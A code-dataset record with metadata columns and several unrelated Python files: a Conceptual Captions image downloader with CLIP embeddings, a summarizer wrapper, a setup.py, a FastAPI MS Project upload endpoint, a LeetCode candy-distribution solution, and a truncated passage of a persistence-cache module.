| 0.298501
| 0
| 0.003408
| 0.37125
| 5,600
| 171
| 79
| 32.748538
| 0.640727
| 0.299107
| 0
| 0.553191
| 0
| 0
| 0.161863
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042553
| false
| 0
| 0.053191
| 0
| 0.12766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af76cb63ff7f339b7e7e1d830fd28ab78f3db4d3
| 9,199
|
py
|
Python
|
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
import torch
import clip
from torch.utils.data import DataLoader, Dataset
from PIL import Image
import pickle
from tqdm import tqdm
import os
import csv
import threading
import requests
import shutil
import PIL
from typing import List, Tuple, Optional
import argparse
from pathlib import Path
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class ConceptualDS(Dataset):
@staticmethod
def get_all_data(data_root: str, suffix: str):
data = []
for i in range(2):
out_data_path = f"{data_root}/conceptual_{suffix}_{i:02d}.pkl"
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
raw_data = pickle.load(f)["info"]
data.append(raw_data)
return data
@staticmethod
def collect(data_root: str, suffix: str):
raw_data = ConceptualDS.get_all_data(data_root, suffix)
data = []
for thread_data in raw_data:
for item in thread_data:
data.append((item, thread_data[item]["caption"]))
return data
def __len__(self):
return len(self.data)
def __getitem__(self, item: int):
image_name, caption = self.data[item]
image_path = f"{self.data_root}/{self.suffix}/{image_name}.jpg"
is_error = False
image = self.dummy
try:
image = self.preprocess(Image.open(image_path)) #.resize(224))
except PIL.UnidentifiedImageError:
is_error = True
except OSError:
is_error = True
except BaseException:
is_error = True
if is_error:
return image, "", image_name
return image, caption, image_name
def __init__(self, data_root: str, preprocess, suffix: str):
self.suffix = suffix
self.data_root = data_root
self.data = self.collect(data_root, suffix)
# print(self.data)
self.preprocess = preprocess
self.dummy = torch.zeros(3, 224, 224)
def save_pickle(data, out_path: str, recover_index: Optional[int] = None):
if os.path.isfile(out_path) and recover_index is not None:
recover_path = f'{out_path[:-4]}_{recover_index:02d}.pkl'
shutil.copyfile(out_path, recover_path)
with open(out_path, 'wb') as f:
pickle.dump(data, f)
def get_image(url: str, out_path: str, timeout=10):
try:
r = requests.get(url, stream=True, timeout=timeout)
if r.status_code == 200:
with open(out_path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
return True
return False
except BaseException:
return False
def thread(urls: List[Tuple[List[str], int]], thread_id: int, progress: tqdm, lock: Optional[threading.Lock],
suffix: str, conceptual_root: str):
out_root = f"{conceptual_root}/{suffix}"
out_data_path = f"{conceptual_root}/conceptual_{suffix}_{thread_id:02d}.pkl"
recover_index = 0
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
data = pickle.load(f)
# print(data)
parsed = data['parsed']
info = data['info']
else:
parsed = set()
info = {}
for i in range(0, len(urls)):
(caption, url), ind = urls[i]
name = f"{ind:08d}"
out_path = f"{out_root}/{name}.jpg"
if url not in parsed and not os.path.isfile(out_path) and get_image(url, out_path):
parsed.add(url)
info[name] = {"url": url, "caption": caption}
if lock is not None:
lock.acquire()
try:
progress.update()
finally:
lock.release()
else:
progress.update()
if (i + 1) % 10 == 0:
# print(f'BINNEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, recover_index)
recover_index = 1 - recover_index
# print(f'BUITEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, 2)
return 0
def download_conceptual(conceptual_root: str, num_threads: int, num_images: int):
urls = []
for suffix in ( "train", "val"):
if suffix == "train":
training_path = f"{conceptual_root}/Train_GCC-training.tsv"
with open(training_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
train_sub_set_path = f'{conceptual_root}/subset_Train_GCC-training.tsv'
if not os.path.exists(train_sub_set_path):
myfile = Path(train_sub_set_path)
myfile.touch(exist_ok=True)
with open(train_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = train_sub_set_path
else:
val_path = f'{conceptual_root}/Validation_GCC-1.1.0-Validation.tsv'
with open(val_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
val_sub_set_path = f'{conceptual_root}/subset_Val_GCC-training.tsv'
if not os.path.exists(val_sub_set_path):
myfile = Path(val_sub_set_path)
myfile.touch(exist_ok=True)
with open(val_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = val_sub_set_path
with open(tsv_path) as f:
read_tsv = csv.reader(f, delimiter="\t")
for i, row in enumerate(read_tsv):
urls.append((row, i))
progress = tqdm(total=len(urls))
if num_threads == 1:
thread(urls, 0, progress, None, suffix, conceptual_root)
else:
groups = []
threads = []
lock = threading.Lock()
split_size = len(urls) // num_threads
for i in range(num_threads):
if i < num_threads - 1:
groups.append(urls[i * split_size: (i + 1) * split_size])
else:
groups.append(urls[i * split_size:])
for i in range(num_threads):
threads.append(threading.Thread(target=thread, args=(groups[i], i, progress, lock, suffix, conceptual_root)))
for i in range(num_threads):
threads[i].start()
for i in range(num_threads):
threads[i].join()
progress.close()
def add_period(caption: str):
caption = caption.strip()
if caption[-1] != '.':
caption = caption + '.'
elif caption[-2] == ' ':
caption = caption[:-2] + '.'
return caption
def create_clip_embeddings(conceptual_root: str, clip_model_type: str):
all_embeddings = []
all_captions = []
for suffix in ("train", "val"):
clip_model, preprocess = clip.load(clip_model_type, device=device, jit=False)
clip_model = clip_model.eval()
ds = ConceptualDS(conceptual_root, preprocess, suffix)
dl = DataLoader(ds, batch_size=2, shuffle=False, drop_last=False)
progress = tqdm(total=len(dl))
counter = 0
clip_model_name = clip_model_type.replace('/', '_')
out_data_path = f"{conceptual_root}/conceptual_clip_{clip_model_name}_{suffix}.pkl"
recover_index = 0
for i, data in enumerate(dl):
images, captions, image_names = data
images = images.to(device)
with torch.no_grad():
prefix = clip_model.encode_image(images).to(device)
# print(f'prefix.shape = {prefix.shape}')
is_valid = list(map(lambda x: x != "", captions))
mask = torch.tensor(is_valid)
all_embeddings.append(prefix[mask])
captions = [caption for j, caption in enumerate(captions) if is_valid[j]]
image_names = [image_name for j, image_name in enumerate(image_names) if is_valid[j]]
all_captions.extend([{"caption": add_period(caption), "clip_embedding": counter + j, "image_id": image_name}
for j, (caption, image_name) in enumerate(zip(captions, image_names))])
progress.update()
counter += len(captions)
if (i + 1) % 1000 == 0:
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, recover_index)
recover_index = 1 - recover_index
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, 2)
progress.close()
return 0
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', default='./data/conceptual')
parser.add_argument('--clip_model_type', default="ViT-B/32", choices=('RN50', 'RN101', 'RN50x4', 'ViT-B/32'))
parser.add_argument('--num_threads', type=int, default=1)
args = parser.parse_args()
download_conceptual(args.data_root, args.num_threads, 100)
create_clip_embeddings(args.data_root, args.clip_model_type)
if __name__ == '__main__':
main()
| 37.70082
| 137
| 0.589521
| 1,174
| 9,199
| 4.400341
| 0.181431
| 0.03523
| 0.023422
| 0.012776
| 0.252226
| 0.21506
| 0.192412
| 0.15331
| 0.130081
| 0.130081
| 0
| 0.011553
| 0.294271
| 9,199
| 243
| 138
| 37.855967
| 0.784196
| 0.014567
| 0
| 0.254717
| 0
| 0
| 0.084115
| 0.053207
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0.070755
| 0.004717
| 0.183962
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af78d3f22f044a728a9a4c210c9bf8cdba9f1cf9
| 7,170
|
py
|
Python
|
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
# Global objects
import datetime
import hashlib
import subprocess
import time
import nltk
from Prediction import Summarizer
from data_utils import DataProcessor
PAD_ID = 0
UNK_ID = 1
vocab_dict, word_embedding_array = DataProcessor().prepare_vocab_embeddingdict()
# # print (len(vocab_embed_object.vocab_dict)-2)
model_cpu = Summarizer(vocab_dict, word_embedding_array)
class Preprocess:
def timestamp(self):
return datetime.datetime.fromtimestamp(time.time()).strftime('[%Y-%m-%d %H:%M:%S]')
def Hashhex(self, s):
"""Returns a heximal formated SHA1 hash of the input string.
Args:
s: The string to hash.
Returns:
A heximal formatted hash of the input string.
"""
h = hashlib.sha1()
h.update(s)
return h.hexdigest()
def stanford_processing(self, log, story, highlights):
story_corenlp = None
highlights_corenlp = None
try:
log += self.timestamp() + " Start Stanford Processing (SSegmentation,Tokenization,NERTagging) ...\n"
story_corenlp = subprocess.check_output(['./corenlp.sh', story])
highlights_corenlp = subprocess.check_output(['./corenlp.sh', highlights])
log += self.timestamp() + " Stanford Processing finished.\n"
except Exception as e:
log += self.timestamp() + " Stanford Processing failed.\n" + str(e) + "\n"
return log, story_corenlp, highlights_corenlp
def corenlp_output_parser(self, text):
data_org = []
# data_ner = []
# data_orglower_anonym = []
data_org_vocabid = []
# Parse Stanford Output Data
# sentdata_list = corenlp_output.strip().split("Sentence #")[1:]
for sentdata in nltk.sent_tokenize(text):
line_org = []
# line_ner = []
for word in nltk.word_tokenize(sentdata):
line_org.append(word)
# if token.startswith("NamedEntityTag="):
# if token.startswith("NamedEntityTag=PERSON"):
# line_ner.append("PERSON")
# elif token.startswith("NamedEntityTag=LOCATION"):
# line_ner.append("LOCATION")
# elif token.startswith("NamedEntityTag=ORGANIZATION"):
# line_ner.append("ORGANIZATION")
# elif token.startswith("NamedEntityTag=MISC"):
# line_ner.append("MISC")
# else:
# line_ner.append("O")
data_org.append(line_org)
# data_ner.append(line_ner)
line_org_vocabid = [vocab_dict[word] if word in vocab_dict else UNK_ID
for word in line_org]
data_org_vocabid.append(line_org_vocabid)
return data_org, data_org_vocabid # data_ner, data_orglower_anonym
def stanford_output_modelIn_processing(self, log, story_corenlp, highlights_corenlp):
story_line_org = None
highlights_line_org = None
document_modelIn = None
try:
log += self.timestamp() + " Start model input preparation (StanOutputParsing,OriginalCases,NotAnonymized,VocabIdMap) ...\n"
story_line_org, story_org_vocabid = self.corenlp_output_parser(story_corenlp)
# print story_line_org, story_orglower_anonym_vocabid
highlights_line_org, _ = self.corenlp_output_parser(highlights_corenlp)
# print highlights_line_org
document_modelIn = DataProcessor().prepare_document_modelIn(story_org_vocabid, [], [])
# print document_modelIn
log += self.timestamp() + " Model input preparation finished.\n"
except Exception as e:
log += self.timestamp() + " Model input preparation failed.\n" + str(e) + "\n"
# print story_line_org, highlights_line_org, document_modelIn
# print document_modelIn.shape
return log, story_line_org, highlights_line_org, document_modelIn
def refresh_prediction(self, log, document_modelIn, doclen):
# global model_cpu
# print document_modelIn, doclen
selected_sentids = None
try:
log += self.timestamp() + " Start predicting with Refresh (Best CNN-trained model from Narayan, Cohen and Lapata, 2018) ...\n"
selected_sentids = model_cpu.prediction(document_modelIn, doclen)
log += self.timestamp() + " Refresh prediction finished.\n"
except Exception as e:
log += self.timestamp() + " Refresh prediction failed.\n" + str(e) + "\n"
return log, selected_sentids
def run_textmode(self, text):
'''Text MODE
'''
# Start a log
log = ""
try:
log += self.timestamp() + " Summarizing a text: No side information used.\n"
# No HTML Parsing and Text Extraction Needed
story = text
highlights = ""
# # Start Stanford Parsing for Sentence Segmentation, Tokenization and NER Tagging
# log, story_corenlp, highlights_corenlp = self.stanford_processing(log, story, highlights)
# print(log)
# if (story_corenlp is None) or (highlights_corenlp is None):
# raise Exception
# print story_corenlp, highlights_corenlp
# Stanford Output Parsing and Preparing input to the model
log, story_line_org, highlights_line_org, document_modelIn = self.stanford_output_modelIn_processing(log,
story,
highlights)
print(log)
if (story_line_org is None) or (highlights_line_org is None) or (document_modelIn is None):
raise Exception
# print story_line_org, highlights_line_org, document_modelIn
# print document_modelIn.shape
# SideNet Prediction
log, selected_sentids = self.refresh_prediction(log, document_modelIn, len(story_line_org))
print(log)
if (selected_sentids is None):
raise Exception
selected_sentids.sort()
print(selected_sentids)
# Generate final outputs
log += self.timestamp() + " Producing output summaries. \n"
slead = "\n".join([" ".join(sent) for sent in story_line_org[:3]])
srefresh = "\n".join([" ".join(story_line_org[sidx]) for sidx in selected_sentids])
sgold = "\n".join([" ".join(sent) for sent in highlights_line_org])
# print log
# print slead
# print ssidenet
# print sgold
return log, slead, srefresh, sgold
except Exception as e:
log += self.timestamp() + " Failed.\n" + str(e) + "\n"
print(log)
return log, "", "", ""
| 40.055866
| 138
| 0.58159
| 751
| 7,170
| 5.336884
| 0.225033
| 0.045409
| 0.047904
| 0.031188
| 0.317615
| 0.217565
| 0.143962
| 0.114022
| 0.092565
| 0.036926
| 0
| 0.002287
| 0.329149
| 7,170
| 178
| 139
| 40.280899
| 0.830977
| 0.235704
| 0
| 0.144444
| 0
| 0.011111
| 0.112618
| 0.018026
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077778
| false
| 0
| 0.077778
| 0.011111
| 0.255556
| 0.044444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af7b2d5d99f6baeaacbb0d347417a474259a0efd
| 447
|
py
|
Python
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 62
|
2015-11-19T18:28:56.000Z
|
2021-12-27T02:50:30.000Z
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 33
|
2015-11-23T01:11:33.000Z
|
2021-04-15T04:23:15.000Z
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 28
|
2015-11-24T18:49:33.000Z
|
2021-12-28T16:48:55.000Z
|
import versioneer
from setuptools import setup
setup_args = dict(
name='nbexamples',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='BSD',
platforms=['Jupyter Notebook'],
packages=[
'nbexamples'
],
include_package_data=True,
install_requires=[
'notebook>=4.2.0',
'nbconvert',
'nbformat'
]
)
if __name__ == '__main__':
setup(**setup_args)
| 19.434783
| 39
| 0.626398
| 44
| 447
| 6.022727
| 0.704545
| 0.075472
| 0.10566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00885
| 0.241611
| 447
| 22
| 40
| 20.318182
| 0.772861
| 0
| 0
| 0
| 0
| 0
| 0.176734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af7e5e86d0f60de6b492ec7b6eafdc2ebea4c16a
| 6,336
|
py
|
Python
|
project-management-api/app/routers/msprojects.py
|
paolo-demagistris-polito/pm-lab-polito-EnvForDigitalProjectDelivery
|
07e121a6613398bf3a8fbb9ec6831720bfcf2c33
|
[
"MIT"
] | 1
|
2022-03-03T14:22:47.000Z
|
2022-03-03T14:22:47.000Z
|
project-management-api/app/routers/msprojects.py
|
paolo-demagistris-polito/pm-lab-polito-EnvForDigitalProjectDelivery
|
07e121a6613398bf3a8fbb9ec6831720bfcf2c33
|
[
"MIT"
] | 3
|
2022-01-20T05:22:52.000Z
|
2022-01-28T09:34:19.000Z
|
project-management-api/app/routers/msprojects.py
|
pm-lab-polito/EnvForDigitalProjectDelivery
|
0bda402f70160eccb8959ffac3d9baeccce60781
|
[
"MIT"
] | null | null | null |
"""
Module for the methods regarding ms projects
"""
import jpype
import jsonpath_ng.ext
import mpxj
from fastapi import APIRouter, File, UploadFile
from datatypes.models import *
from dependencies import *
router = APIRouter(
prefix="/msprojects",
tags=["msprojects"],
dependencies=[]
)
@router.post("/",
dependencies=[Depends(require_project_permission(Permissions.edit))])
async def add_ms_file_to_project(file: UploadFile = File(...),
user: User = Depends(get_current_active_user),
db_project: Project = Depends(get_project),
session: Session = Depends(get_session)):
"""
Add a ms file to a project
:param request_body: request body
:param file: ms file to upload
:param user: current authenticated user
:param db_project: project to add the file to
:param session: session to use
:return: uploaded ms project
"""
if not file.filename.endswith(".mpp"):
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="File is not a ms project")
file_name = file.filename.split(".")[0]
content = await file.read()
jpype.startJVM()
from net.sf.mpxj.reader import UniversalProjectReader
project = UniversalProjectReader().read(jpype.java.io.ByteArrayInputStream(content))
tasks = []
for task in project.getTasks():
db_task = dict()
db_task["name"] = str(task.getName().toString())
db_task["level"] = task.getOutlineLevel()
db_task["duration"] = str(task.getDuration().toString())
db_task["predecessors"] = list()
db_task["ef"] = str(task.getEarlyFinish().toString())
db_task["es"] = str(task.getEarlyStart().toString())
db_task["lf"] = str(task.getLateFinish().toString())
db_task["ls"] = str(task.getLateStart().toString())
db_task["start"] = str(task.getStart().toString())
db_task["finish"] = str(task.getFinish().toString())
db_task["cost"] = str(task.getCost().toString())
db_task["id"] = str(task.getID().toString())
for rel in task.getPredecessors():
db_pred = dict()
db_pred["target_task"] = str(rel.getTargetTask().getName().toString())
db_pred["target_task_id"] = str(rel.getTargetTask().getID().toString())
db_pred["lag"] = str(rel.getLag().toString())
db_pred["type"] = str(rel.getType().toString())
db_task["predecessors"].append(db_pred)
tasks.append(db_task)
resources = []
for res in project.getResources():
if res.getName() is not None and res.getName() != "":
db_res = dict()
db_res["name"] = str(res.getName().toString())
db_res["id"] = str(res.getID().toString())
resources.append(db_res)
project_properties = project.getProjectProperties()
proj_info = dict()
if project_properties.getStartDate() is not None:
proj_info["baseline_start"] = str(project_properties.getStartDate().toString())
if project_properties.getActualStart() is not None:
proj_info["actual_start"] = str(project_properties.getActualStart().toString())
if project_properties.getFinishDate() is not None:
proj_info["baseline_finish"] = str(project_properties.getFinishDate().toString())
if project_properties.getActualFinish() is not None:
proj_info["actual_finish"] = str(project_properties.getActualFinish().toString())
if project_properties.getBaselineDuration() is not None:
proj_info["baseline_duration"] = str(project_properties.getBaselineDuration().toString())
if project_properties.getActualDuration() is not None:
proj_info["actual_duration"] = str(project_properties.getActualDuration().toString())
if project_properties.getCurrencySymbol() is not None:
proj_info["currency_code"] = str(project_properties.getCurrencyCode().toString())
tmp = crud.get_ms_project(session, db_project.project_name, file_name)
if tmp is not None:
db_msproj = tmp
else:
db_msproj = MSProject(project_name=db_project.project_name,
ms_project_name=file_name,
author_name=user.user_name)
db_msproj.update_author_name = user.user_name
db_msproj.tasks = tasks
db_msproj.resources = resources
db_msproj.proj_info = proj_info
session.add(db_msproj)
session.commit()
session.refresh(db_msproj)
for computed_field in db_msproj.computed_fields_reference:
jsonpath_expr = jsonpath_ng.ext.parse(computed_field.jsonpath)
match computed_field.field_from:
case MSProjectField.tasks:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.tasks)))
case MSProjectField.resources:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.resources)))
case MSProjectField.proj_info:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.proj_info)))
session.add(computed_field)
session.add(db_msproj)
session.commit()
session.refresh(db_msproj)
jpype.shutdownJVM()
return db_msproj
@router.get("/{ms_project_name}",
dependencies=[Depends(require_project_permission(Permissions.view))])
async def get_ms_file_of_project(db_ms_project: MSProject = Depends(get_ms_project)):
"""
Get ms file of a project
:param db_ms_project: ms project from dependencies
:return: ms project if found, 404 otherwise
"""
return db_ms_project
@router.delete("/{ms_project_name}",
dependencies=[Depends(require_project_permission(Permissions.edit))])
async def delete_ms_file_of_project(db_ms_project: MSProject = Depends(get_ms_project),
session: Session = Depends(get_session)):
"""
Delete ms file of a project
:param db_ms_project: ms project from dependencies
:param session: session from dependencies
:return: 200 ok if deleted, 404 if not found
"""
session.delete(db_ms_project)
session.commit()
raise HTTPException(status_code=200, detail="OK")
| 37.94012
| 114
| 0.665404
| 755
| 6,336
| 5.365563
| 0.22649
| 0.037768
| 0.034559
| 0.022464
| 0.254505
| 0.250309
| 0.197729
| 0.182918
| 0.182918
| 0.130585
| 0
| 0.003228
| 0.217645
| 6,336
| 166
| 115
| 38.168675
| 0.814
| 0.006944
| 0
| 0.1
| 0
| 0
| 0.05149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.063636
| 0
| 0.081818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af808a47b333d62757233f327d638f9ef66a62b6
| 563
|
py
|
Python
|
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
class Solution:
def distributeCandies(self, candies: int, n: int) -> List[int]:
ans = [0] * n
rows = int((-n + (n**2 + 8 * n**2 * candies)**0.5) / (2 * n**2))
accumN = rows * (rows - 1) * n // 2
for i in range(n):
ans[i] = accumN + rows * (i + 1)
givenCandies = (n**2 * rows**2 + n * rows) // 2
candies -= givenCandies
lastGiven = rows * n
i = 0
while candies > 0:
lastGiven += 1
actualGiven = min(lastGiven, candies)
candies -= actualGiven
ans[i] += actualGiven
i += 1
return ans
| 24.478261
| 68
| 0.515098
| 78
| 563
| 3.717949
| 0.346154
| 0.034483
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046997
| 0.319716
| 563
| 22
| 69
| 25.590909
| 0.710183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af815fbf98829714e6eda7b837a98b8d597117ab
| 38,711
|
py
|
Python
|
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
"""
This module provides local and cloud storage of computed values. The main
point of entry is the PersistentCache, which encapsulates this functionality.
"""
import attr
import os
import shutil
import tempfile
import yaml
import warnings
from uuid import uuid4
from pathlib import Path
from bionic.exception import EntitySerializationError, UnsupportedSerializedValueError
from .datatypes import Result
from .gcs import GcsTool
from .utils.files import (
ensure_dir_exists,
ensure_parent_dir_exists,
recursively_copy_path,
)
from .utils.misc import hash_simple_obj_to_hex, oneline
from .utils.urls import (
derelativize_url,
path_from_url,
relativize_url,
url_from_path,
)
from .tokenization import tokenize
import logging
logger = logging.getLogger(__name__)
try:
# The C-based YAML emitter is much faster, but requires separate bindings
# which may not be installed.
YamlDumper = yaml.CDumper
YamlLoader = yaml.CLoader
except AttributeError:
running_under_readthedocs = os.environ.get("READTHEDOCS") == "True"
if not running_under_readthedocs:
warnings.warn(
oneline(
"""
Failed to find LibYAML bindings;
falling back to slower Python implementation.
This may reduce performance on large flows.
Installing LibYAML should resolve this."""
)
)
YamlDumper = yaml.Dumper
YamlLoader = yaml.Loader
class PersistentCache:
"""
Provides a persistent mapping between Queries (things we could compute) and
saved Results (computed Queries). You use it by getting a CacheAccessor
for your specific query, and then performing load/save operations on the
accessor.
When looking up a Query, the cache searches for a saved artifact with a
matching Query. The Query may not match exactly: each Query contains a
Provenance, which represents all the code and data used to compute a value,
and two Provenances can match at different levels of precision, from a
"functional" match to an "exact" one. A functional match is sufficient to
treat two artifacts as interchangeable; the finer levels of matching are
only used by the "assisted versioning" system, which tries to detect
situations where a function's bytecode has changed but its version hasn't.
The cache has two tiers: a "local" tier on disk, which is cheap to access,
and an optional "cloud" tier backed by GCS, which is more expensive to
access (but globally accessible). For load operations, the cache returns
the cheapest artifact that functionally matches the Query. For save
operations, the cache records an exact entry in both tiers.
The cache actually has two distinct responsibilities: (a) translating
between in-memory Python objects and serialized files or blobs, and (b)
maintaining an "inventory" of these files and blobs. Currently it makes
sense to group these responsibilities together at each tier, where the
local inventory tracks the local files and the cloud inventory tracks the
cloud blobs. Each of these tiers is handled by a "store" class. However,
in the future we may have other types of persistent artifacts (like
database tables) which don't have their own inventory type. In this case
we might want to split these responsibilities out.
"""
def __init__(self, local_store, cloud_store):
self._local_store = local_store
self._cloud_store = cloud_store
def get_accessor(self, query):
return CacheAccessor(self, query)
class CacheAccessor:
"""
Provides a reference to the cache entries for a specific query. This
interface is convenient, and it also allows us to maintain some memoized
state for each query, saving redundant lookups.
"""
def __init__(self, parent_cache, query):
self.query = query
self.value_filename_stem = valid_filename_from_query(self.query) + "."
self._local = parent_cache._local_store
self._cloud = parent_cache._cloud_store
# These values are memoized to avoid roundtrips.
self._stored_local_entry = None
self._stored_cloud_entry = None
def flush_stored_entries(self):
"""
Flushes the stored local and cloud cached entries.
"""
self._stored_local_entry = None
self._stored_cloud_entry = None
def can_load(self):
"""
Indicates whether there are any cached artifacts for this query.
"""
try:
return self._get_nearest_entry_with_artifact() is not None
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_provenance(self):
"""
Returns the provenance of the nearest cached artifact for this query,
if one exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
return entry.provenance
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_result(self):
"""
Returns a Result for the nearest cached artifact for this query, if one
exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
if entry.tier == "local":
file_path = path_from_url(entry.artifact_url)
elif entry.tier == "cloud":
blob_url = entry.artifact_url
file_path = self._file_from_blob(blob_url)
else:
raise AssertionError("Unrecognized tier: " + entry.tier)
value = self._value_from_file(file_path)
value_hash = self.query.protocol.tokenize_file(file_path)
return Result(
query=self.query,
value=value,
file_path=file_path,
value_hash=value_hash,
)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_result_value_hash(self):
"""
Returns only the value hash for the nearest cached artifact for
this query, if one exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
return entry.value_hash
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def save_result(self, result):
"""
Saves a Result in each cache layer that doesn't already have an exact
match.
"""
try:
self._save_or_reregister_result(result)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def update_provenance(self):
"""
Adds an entry to each cache layer that doesn't already have an exact
match for this query. There must be already be at least one cached
functional match -- i.e., ``can_load()`` must already return True.
"""
try:
self._save_or_reregister_result(None)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def _save_or_reregister_result(self, result):
local_entry = self._get_local_entry()
cloud_entry = self._get_cloud_entry()
self.flush_stored_entries()
if result is not None:
value_wrapper = NullableWrapper(result.value)
file_path = result.file_path
value_hash = result.value_hash
else:
value_wrapper = None
file_path = None
value_hash = None
blob_url = None
if file_path is None:
if local_entry.has_artifact:
file_path = path_from_url(local_entry.artifact_url)
value_hash = local_entry.value_hash
elif value_wrapper is not None:
